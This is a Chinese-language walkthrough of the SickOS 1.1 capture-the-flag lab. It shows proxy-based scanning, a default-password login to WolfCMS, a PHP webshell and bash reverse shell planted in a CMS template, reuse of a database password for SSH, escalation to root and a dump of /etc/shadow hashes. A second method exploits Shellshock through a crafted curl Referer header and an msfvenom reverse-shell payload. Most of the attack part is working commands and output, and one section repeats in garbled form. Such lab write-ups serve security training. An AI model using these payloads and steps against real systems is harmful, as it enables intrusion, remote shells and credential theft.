下载地址
https://www.vulnhub.com/?q=SickOS1.1
主机发现
nmap 192.168.52.0/24
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00027s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:B8:7F:12 (VMware)
端口扫描
tcp扫描
nmap -p- -A 192.168.52.142
Starting Nmap 7.91 ( https://nmap.org ) at 2023-06-05 03:56 EDT
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00053s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:B8:7F:12 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms localhost (192.168.52.142)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 137.39 seconds
UDP扫描
nmap -sU -p22,3128,8080 192.168.52.142 148 ⨯ 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2023-06-05 11:38 EDT
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00043s latency).
PORT STATE SERVICE
22/udp open|filtered ssh
3128/udp open|filtered ndl-aas
8080/udp open|filtered http-alt
MAC Address: 00:0C:29:B8:7F:12 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
漏洞扫描
nmap
nmap -p- --script=vuln 192.168.52.142
Starting Nmap 7.91 ( https://nmap.org ) at 2023-06-05 11:19 EDT
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for localhost (192.168.52.142)
Host is up (0.00051s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3128/tcp open squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:B8:7F:12 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 140.53 seconds
searchsploit
看到扫描出来的3128端口,有squid服务,可以尝试一下
searchsploit squid
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
MySQL Squid Access Report 2.1.4 - HTML Injection | php/webapps/20055.txt
MySQL Squid Access Report 2.1.4 - SQL Injection / Cross-Si | php/webapps/44483.txt
National Science Foundation Squid Proxy 2.3 - Internet Acc | linux/remote/24105.txt
National Science Foundation Squid Web Proxy 1.0/1.1/2.1 - | linux/remote/19567.txt
PageSquid CMS 0.3 Beta - 'index.php' SQL Injection | php/webapps/5899.txt
Squid - 'httpMakeVaryMark()' Remote Denial of Service | linux/dos/38365.txt
Squid - NTLM (Authenticated) Overflow (Metasploit) | linux/remote/16847.rb
Squid 2.0-4 - Cache FTP Proxy URL Buffer Overflow | unix/remote/21297.c
Squid 2.4.1 - Remote Buffer Overflow | linux/remote/347.c
Squid 2.5.x/3.x - NTLM Buffer Overflow (Metasploit) | multiple/remote/9951.rb
Squid 3.3.5 - Denial of Service (PoC) | linux/dos/26886.pl
Squid < 3.1 5 - HTTP Version Number Parsing Denial of Serv | multiple/dos/8021.pl
Squid Analysis Report Generator 2.3.10 - Remote Code Execu | php/webapps/42993.txt
Squid Proxy 2.4/2.5 - NULL URL Character Unauthorized Acce | linux/remote/23777.txt
Squid Proxy 2.5/2.6 - FTP URI Remote Denial of Service | linux/dos/29473.txt
Squid Web Proxy 2.2 - 'cachemgr.cgi' Unauthorized Connecti | cgi/remote/20465.sh
Squid Web Proxy 2.3 - Reverse Proxy | linux/remote/21017.txt
SquidGuard 1.4 - Long URL Handling Remote Denial of Servic | xml/dos/37685.txt
SquidGuard 1.x - NULL URL Character Unauthorized Access | linux/remote/23848.txt
----------------------------------------------------------- ---------------------------------
Shellcodes: No Results
目录扫描
3128端口
gobuster dir -u http://192.168.52.142 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.52.142
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2023/06/05 11:26:27 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.52.142/: Get "http://192.168.52.142/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
没有扫描出什么。
为什么会想到要开代理进行扫描呢?
开代理进行扫描
试一下用3128作为代理进行扫描目录
dirseach
dirsearch -u http://192.168.52.142 --proxy=http://192.168.52.142:3128
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.52.142/_23-06-05_11-51-12.txt
Error Log: /root/.dirsearch/logs/errors-23-06-05_11-51-12.log
Target: http://192.168.52.142/
[11:51:12] Starting:
[11:51:13] 403 - 293B - /.ht_wsr.txt
[11:51:13] 403 - 296B - /.htaccess.bak1
[11:51:13] 403 - 296B - /.htaccess.save
[11:51:13] 403 - 298B - /.htaccess.sample
[11:51:13] 403 - 297B - /.htaccess_extra
[11:51:13] 403 - 296B - /.htaccess.orig
[11:51:13] 403 - 296B - /.htaccess_orig
[11:51:13] 403 - 295B - /.htaccessOLD2
[11:51:13] 403 - 294B - /.htaccess_sc
[11:51:13] 403 - 294B - /.htaccessBAK
[11:51:14] 403 - 294B - /.htaccessOLD
[11:51:14] 403 - 286B - /.htm
[11:51:14] 403 - 287B - /.html
[11:51:14] 403 - 292B - /.htpasswds
[11:51:14] 403 - 296B - /.htpasswd_test
[11:51:14] 403 - 293B - /.httr-oauth
[11:51:25] 403 - 290B - /cgi-bin/
[11:51:27] 403 - 286B - /doc/
[11:51:27] 403 - 290B - /doc/api/
[11:51:27] 403 - 301B - /doc/html/index.html
[11:51:27] 403 - 300B - /doc/stable.version
[11:51:27] 403 - 301B - /doc/en/changes.html
[11:51:30] 200 - 21B - /index
[11:51:30] 200 - 21B - /index.php
[11:51:30] 200 - 21B - /index.php/login/
[11:51:39] 200 - 45B - /robots.txt
[11:51:39] 403 - 295B - /server-status
[11:51:39] 403 - 296B - /server-status/
dirb
dirb http://192.168.52.142 -p http://192.168.52.142:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 5 11:57:30 2023
URL_BASE: http://192.168.52.142/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.52.142:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.52.142/ ----
+ http://192.168.52.142/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.52.142/connect (CODE:200|SIZE:109)
+ http://192.168.52.142/index (CODE:200|SIZE:21)
+ http://192.168.52.142/index.php (CODE:200|SIZE:21)
+ http://192.168.52.142/robots (CODE:200|SIZE:45)
+ http://192.168.52.142/robots.txt (CODE:200|SIZE:45)
+ http://192.168.52.142/server-status (CODE:403|SIZE:295)
-----------------
END_TIME: Mon Jun 5 11:57:32 2023
DOWNLOADED: 4612 - FOUND: 7
看到connect、server-status要注意,这是值得注意的点。
还看到robots.txt,index.php等。
使用dirsearch扫描可以看到/index.php/login/ ,一个登录链接。
通过代理才可以扫描出来,那我们访问也要设置代理才可以去访问。
设置代理
浏览器打开设置
然后就可以浏览器访问到了。
访问
index.php
index.php/login/
robots.txt
User-agent: *
Disallow: /
Dissalow: /wolfcms
看到有一个cms是wolf,这是重要信息。
connect
访问就是下载一个文件。
打开
#!/usr/bin/python
print "I Try to connect things very frequently\n"
print "You may want to try my services"
#"我试着频繁地把事情联系起来"
#"你也许想试试我的服务"
根据robots.txt得到有一个路径是/wolfcms,可以访问一下。
/wolfcms
可以扫一下目录
dirb
dirb http://192.168.52.142/wolfcms/ -p http://192.168.52.142:3128
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 5 21:33:04 2023
URL_BASE: http://192.168.52.142/wolfcms/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.52.142:3128
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.52.142/wolfcms/ ----
+ http://192.168.52.142/wolfcms/composer (CODE:200|SIZE:403)
+ http://192.168.52.142/wolfcms/config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.52.142/wolfcms/docs/
+ http://192.168.52.142/wolfcms/favicon.ico (CODE:200|SIZE:894)
+ http://192.168.52.142/wolfcms/index (CODE:200|SIZE:3975)
+ http://192.168.52.142/wolfcms/index.php (CODE:200|SIZE:3975)
==> DIRECTORY: http://192.168.52.142/wolfcms/public/
+ http://192.168.52.142/wolfcms/robots (CODE:200|SIZE:0)
+ http://192.168.52.142/wolfcms/robots.txt (CODE:200|SIZE:0)
---- Entering directory: http://192.168.52.142/wolfcms/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.52.142/wolfcms/public/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon Jun 5 21:33:06 2023
DOWNLOADED: 4612 - FOUND: 7
dirsearch
dirsearch -u http://192.168.52.142/wolfcms/ --proxy=192.168.52.142:3128
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.52.142/-wolfcms-_23-06-05_21-42-22.txt
Error Log: /root/.dirsearch/logs/errors-23-06-05_21-42-22.log
Target: http://192.168.52.142/wolfcms/
[21:42:22] Starting:
[21:42:24] 403 - 301B - /wolfcms/.ht_wsr.txt
[21:42:24] 403 - 304B - /wolfcms/.htaccess.bak1
[21:42:24] 403 - 304B - /wolfcms/.htaccess.orig
[21:42:24] 403 - 306B - /wolfcms/.htaccess.sample
[21:42:24] 403 - 304B - /wolfcms/.htaccess.save
[21:42:24] 403 - 302B - /wolfcms/.htaccessOLD
[21:42:24] 403 - 305B - /wolfcms/.htaccess_extra
[21:42:24] 403 - 302B - /wolfcms/.htaccess_sc
[21:42:24] 403 - 303B - /wolfcms/.htaccessOLD2
[21:42:24] 403 - 302B - /wolfcms/.htaccessBAK
[21:42:24] 403 - 304B - /wolfcms/.htaccess_orig
[21:42:24] 403 - 294B - /wolfcms/.htm
[21:42:24] 403 - 295B - /wolfcms/.html
[21:42:24] 403 - 300B - /wolfcms/.htpasswds
[21:42:24] 403 - 301B - /wolfcms/.httr-oauth
[21:42:24] 403 - 304B - /wolfcms/.htpasswd_test
[21:42:26] 200 - 4KB - /wolfcms/CONTRIBUTING.md
[21:42:27] 200 - 2KB - /wolfcms/README.md
[21:42:36] 200 - 403B - /wolfcms/composer.json
[21:42:36] 200 - 0B - /wolfcms/config
[21:42:36] 200 - 0B - /wolfcms/config.php
[21:42:36] 200 - 0B - /wolfcms/config/
[21:42:36] 200 - 0B - /wolfcms/config/apc.php
[21:42:36] 200 - 0B - /wolfcms/config/app.php
[21:42:36] 200 - 0B - /wolfcms/config/app.yml
[21:42:36] 200 - 0B - /wolfcms/config/AppData.config
[21:42:36] 200 - 0B - /wolfcms/config/banned_words.txt
[21:42:36] 200 - 0B - /wolfcms/config/config.inc
[21:42:36] 200 - 0B - /wolfcms/config/autoload/
[21:42:36] 200 - 0B - /wolfcms/config/config.ini
[21:42:36] 200 - 0B - /wolfcms/config/database.yml
[21:42:36] 200 - 0B - /wolfcms/config/aws.yml
[21:42:36] 200 - 0B - /wolfcms/config/database.yml.sqlite3
[21:42:36] 200 - 0B - /wolfcms/config/database.yml.pgsql
[21:42:36] 200 - 0B - /wolfcms/config/database.yml~
[21:42:36] 200 - 0B - /wolfcms/config/db.inc
[21:42:36] 200 - 0B - /wolfcms/config/databases.yml
[21:42:36] 200 - 0B - /wolfcms/config/database.yml_original
[21:42:36] 200 - 0B - /wolfcms/config/initializers/secret_token.rb
[21:42:36] 200 - 0B - /wolfcms/config/master.key
[21:42:36] 200 - 0B - /wolfcms/config/development/
[21:42:36] 200 - 0B - /wolfcms/config/monkdonate.ini
[21:42:36] 200 - 0B - /wolfcms/config/monkid.ini
[21:42:36] 200 - 0B - /wolfcms/config/routes.yml
[21:42:36] 200 - 0B - /wolfcms/config/settings.inc
[21:42:36] 200 - 0B - /wolfcms/config/monkcheckout.ini
[21:42:36] 200 - 0B - /wolfcms/config/settings.ini.cfm
[21:42:36] 200 - 0B - /wolfcms/config/settings.ini
[21:42:36] 200 - 0B - /wolfcms/config/producao.ini
[21:42:36] 200 - 0B - /wolfcms/config/settings.local.yml
[21:42:36] 200 - 0B - /wolfcms/config/xml/
[21:42:36] 200 - 0B - /wolfcms/config/settings/production.yml
[21:42:36] 200 - 0B - /wolfcms/config/site.php
[21:42:38] 200 - 2KB - /wolfcms/docs/
[21:42:38] 301 - 323B - /wolfcms/docs -> http://192.168.52.142/wolfcms/docs/
[21:42:38] 200 - 7KB - /wolfcms/docs/updating.txt
[21:42:39] 200 - 894B - /wolfcms/favicon.ico
[21:42:41] 200 - 4KB - /wolfcms/index
[21:42:41] 200 - 4KB - /wolfcms/index.php
[21:42:41] 200 - 4KB - /wolfcms/index.php/login/
[21:42:48] 200 - 1KB - /wolfcms/public/
[21:42:48] 301 - 325B - /wolfcms/public -> http://192.168.52.142/wolfcms/public/
[21:42:49] 200 - 0B - /wolfcms/robots.txt
Task Completed
访问
/composer
看到版本v1.0.12
robots.txt
没有什么东西
config
没什么东西
/docs
/public/
/themes
/simple
/wolf
思路
看到正常的文章前面也有?加其他信息,如果?加上amdin可能就是管理员登录路径。
找到管理员的路径
可以通过搜索引擎搜索
wolf cms admin path
访问一下
http://192.168.52.142/wolfcms/?/admin/login
密码思路
默认密码,弱口令,其他提示知道。
可以通过搜索引擎进行搜索
wolf cms default admin password
通过这个可以确定用户名大概率是admin,但是密码不清楚,那就尝试弱口令,弱口令不可以就进行爆破,不过这个尝试5次失败就会禁止30秒,可以通过其他方式进行绕过。
进行弱口令
最后发现admin admin可以成功。
登录进来
写入webshell
寻找功能点进行写入webshell。
点击一下发现是主页模板的管理,可以直接写入webshell。
然后使用蚁剑进行连接。
因为访问这个需要设置代理才可以访问,所以蚁剑也需要设代理才可以连接shell。
蚁剑设置代理
填写代理
连接webshell
反弹shell
也可以写入反弹shell
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.52.134/14452 0>&1'");?>
可以看到连接成功
查看信息
(www-data:/var/www/wolfcms) $ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
(www-data:/var/www/wolfcms) $ whoami
www-data
(www-data:/var/www/wolfcms) $ sudo -l
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: no tty present and no askpass program specified
Sorry, try again.
sudo: 3 incorrect password attempts
(www-data:/var/www/wolfcms) $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false
(www-data:/var/www/wolfcms) $ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
可以看到当前用户是www-data,没有什么权限。
查看passwd表可以看到有/bin/bash的用户有root,sickos。
看看有什么文件,一般是看看配置文件等。
文件管理中看到一个文件:config.php
使用vi打开看看
vi config.php
<?php
// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
// Should Wolf produce PHP error messages for debugging?
define('DEBUG', false);
// Should Wolf check for updates on Wolf itself and the installed plugins?
define('CHECK_UPDATES', true);
// The number of seconds before the check for a new Wolf version times out in ca
se of problems.
define('CHECK_TIMEOUT', 3);
看到数据库的账号是root 密码是john@123
这个靶机开启了22端口,可以考虑一下ssh连接。
账号就考虑有/bin/bash权限的用户,root,sickos。
都尝试一下,密码就为john@123
ssh连接
最终成功ssh连接。
ssh sickos@192.168.52.142
查看信息
sickos@SickOs:~$ uname -a
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
sickos@SickOs:~$ whoami
sickos
sickos@SickOs:~$ sudo -l
[sudo] password for sickos:
Matching Defaults entries for sickos on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sickos may run the following commands on this host:
(ALL : ALL) ALL
sickos@SickOs:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:b8:7f:12
inet addr:192.168.52.142 Bcast:192.168.52.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:feb8:7f12/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:41931 errors:26 dropped:26 overruns:0 frame:0
TX packets:39619 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:41839260 (41.8 MB) TX bytes:34739851 (34.7 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:503 errors:0 dropped:0 overruns:0 frame:0
TX packets:503 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:304468 (304.4 KB) TX bytes:304468 (304.4 KB)
sickos@SickOs:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
提权
查看cat /etc/shadow说是权限不足,那就提权,使用sudo -l查看权限,全all,那就可以使用sudo su提权,提权后再查看/etc/shadow文件。
sickos@SickOs:~$ sudo su
root@SickOs:/home/sickos# cat /etc/shadow
root:$6$0QtWAOH/$6uGGYVCw2lccBlovXeH8dqH6ILcCRZw.OydoldEZVS3m7RxgdUoZLl3UbDId59KMTUuxkGG/ln0gbwWSO7kNp.:16775:0:99999:7:::
daemon:*:16700:0:99999:7:::
bin:*:16700:0:99999:7:::
sys:*:16700:0:99999:7:::
sync:*:16700:0:99999:7:::
games:*:16700:0:99999:7:::
man:*:16700:0:99999:7:::
lp:*:16700:0:99999:7:::
mail:*:16700:0:99999:7:::
news:*:16700:0:99999:7:::
uucp:*:16700:0:99999:7:::
proxy:*:16700:0:99999:7:::
www-data:*:16700:0:99999:7:::
backup:*:16700:0:99999:7:::
list:*:16700:0:99999:7:::
irc:*:16700:0:99999:7:::
gnats:*:16700:0:99999:7:::
nobody:*:16700:0:99999:7:::
libuuid:!:16700:0:99999:7:::
syslog:*:16700:0:99999:7:::
messagebus:*:16700:0:99999:7:::
whoopsie:*:16700:0:99999:7:::
landscape:*:16700:0:99999:7:::
sshd:*:16700:0:99999:7:::
sickos:$6$x3xnQBfR$4WohiqaIzmpfk1duLLeJqA33zNhEQeuvPS4NiLLIxxOyNwz2dRMUbah.MZ0gSVMV4YNJC6meNpxa4YSrSJ75X.:16700:0:99999:7:::
mysql:!:16774:0:99999:7:::
查看flag
root@SickOs:/home/sickos# cd /
root@SickOs:/# ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run selinux sys usr vmlinuz
root@SickOs:/# cd root
root@SickOs:~# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
到这结束。
log::16700:0:99999:7:::
messagebus::16700:0:99999:7:::
whoopsie::16700:0:99999:7:::
landscape::16700:0:99999:7:::
sshd:*:16700:0:99999:7:::
sickos:
6
6
6x3xnQBfR$4WohiqaIzmpfk1duLLeJqA33zNhEQeuvPS4NiLLIxxOyNwz2dRMUbah.MZ0gSVMV4YNJC6meNpxa4YSrSJ75X.:16700:0:99999:7:::
mysql:!:16774:0:99999:7:::
# 查看flag
root@SickOs:/home/sickos# cd /
root@SickOs:/# ls
bin dev home lib media opt root sbin srv tmp var
boot etc initrd.img lost+found mnt proc run selinux sys usr vmlinuz
root@SickOs:/# cd root
root@SickOs:~# ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying
到这结束。
学习渠道:b站的红队笔记。
解法二
Nikto扫描
学习链接
https://blog.csdn.net/m0_54471074/article/details/128623767
https://www.cnblogs.com/opama/p/4928657.html
代理扫描
nikto -h 192.168.52.142 -useproxy 192.168.52.142:3128
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.52.142
+ Target Hostname: 192.168.52.142
+ Target Port: 80
+ Proxy: 192.168.52.142:3128
+ Start Time: 2023-06-08 20:38:19 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Retrieved via header: 1.0 localhost (squid/3.1.19).
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec 4 19:35:02 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ : Server banner changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19'.
+ /: Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /cgi-bin/status: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8912 requests: 2 error(s) and 20 item(s) reported on remote host
+ End Time: 2023-06-08 20:39:24 (GMT-4) (65 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
扫到squid/3.1.19服务,Apache/2.2.22,还可以看到
/cgi-bin/status: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
/cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278
/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
CVE-2014-6278、OSVDB-12184
Shellshock原理
Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞。Shellshock是一个特权升级漏洞。在老机器中十分常见,bash<=4.1。
开采载体
CGI的Web服务器
OpenSSH服务器
DHCP客户端
Qmail服务器
IBM HMC受限制的shell
学习链接
https://baike.baidu.com/item/Shellshock/15862860?fr=aladdin
https://www.cnblogs.com/jzking121/p/15142327.html
Shellshock验证
curl
-v可以看到更多信息。
要注意空格。
sudo curl -v --proxy http://192.168.52.142:3128 http://192.168.52.142/cgi-bin/status -H "Referer:() { test;};echo 'Content-Type: text/plain';echo;echo;/usr/bin/id;exit"
* Trying 192.168.52.142:3128...
* Connected to 192.168.52.142 (192.168.52.142) port 3128 (#0)
> GET http://192.168.52.142/cgi-bin/status HTTP/1.1
> Host: 192.168.52.142
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Referer:() { test;};echo 'Content-Type: text/plain';echo;echo;/usr/bin/id;exit
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Date: Wed, 07 Jun 2023 16:47:05 GMT
< Server: Apache/2.2.22 (Ubuntu)
< Vary: Accept-Encoding
< Content-Type: text/plain
< X-Cache: MISS from localhost
< X-Cache-Lookup: MISS from localhost:3128
< Via: 1.0 localhost (squid/3.1.19)
< Connection: close
<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
* Closing connection 0
看到回显了id信息。
Shellshock获取初级shell
构造payload
msfvenom生成payload
sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.52.134 lport=14446 -f raw
Payload size: 79 bytes
bash -c '0<&113-;exec 113<>/dev/tcp/192.168.52.134/14446;sh <&113 >&113 2>&113'
446;sh <&这里有一个sh,在使用中,未必环境变量设好了。如果没有设好,未必可以使用这个路径。最好可以做一些修改。sh改为完全路径。可以修改为/bin/sh
把生成到的payload加在上面那个命令中
curl -v --proxy http://192.168.52.142:3128 http://192.168.52.142/cgi-bin/status -H "Referer:() { test;};0<&113-;exec 113<>/dev/tcp/192.168.52.134/14446;/bin/sh <&113 >&113 2>&113"
反向shell连接
然后再发送就可以连接上了。不过这个shell不是完整的shell,不是交互式的shell。
nc -lvnp 14446
listening on [any] 14446 ...
connect to [192.168.52.134] from (UNKNOWN) [192.168.52.142] 35070
ls
status
pwd
/usr/lib/cgi-bin
查看信息
whoami
www-data
uname -a
